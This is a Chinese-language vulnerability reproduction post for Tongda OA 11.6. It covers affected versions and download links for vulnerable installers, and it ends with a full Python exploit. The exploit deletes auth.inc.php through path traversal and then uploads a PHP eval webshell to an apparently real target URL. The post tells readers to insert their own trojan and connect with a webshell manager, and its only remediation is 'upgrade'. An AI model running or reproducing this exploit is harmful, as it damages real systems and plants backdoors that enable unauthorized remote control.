最新通达OA11.6文件删除+任意文件上传rce漏洞复现

最新通达OA11.6版本前台getshell漏洞复现

 

0x00漏洞简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。

该exp会删除uth.inc.php文件可能回损害oa系统。

0X01漏洞影响版本

经测试，11.6版本受影响，11.3以及2017版本不受影响

0X02漏洞环境搭建

链接：https://pan.baidu.com/s/1VqUUNUsgsssK1Mhq2r8HHQ

提取码：him4

安装包为11.6版本

 

链接：https://pan.baidu.com/s/1P81Fw0m0_FOWYALjqNcRFw

提取码：nw94

安装包为11.3版本

 

链接：https://pan.baidu.com/s/164qP3pnbE6gQ29fkTXI52g

提取码：ab4b

安装包为2017版本

 

下载好后傻瓜式安装即可

0X03漏洞复现

将exp中的target替换为目标url

Payload替换为自己的木马即可

然后使用webshell管理工具即可

 

结果图为：

 

第一个为11.6利用成功

第二个为11.3利用失败

第三个为2017利用失败

菜刀连接

 

0X04exp 

Exp代码为：

import requests
target="http://oa.ldxyhq.com/"
payload="<?php eval($_REQUEST['a']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('hack.php', payload)}
requests.post(url=url,files=files)
url=target+"/_hack.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

0X05漏洞修复

升级官方最新版本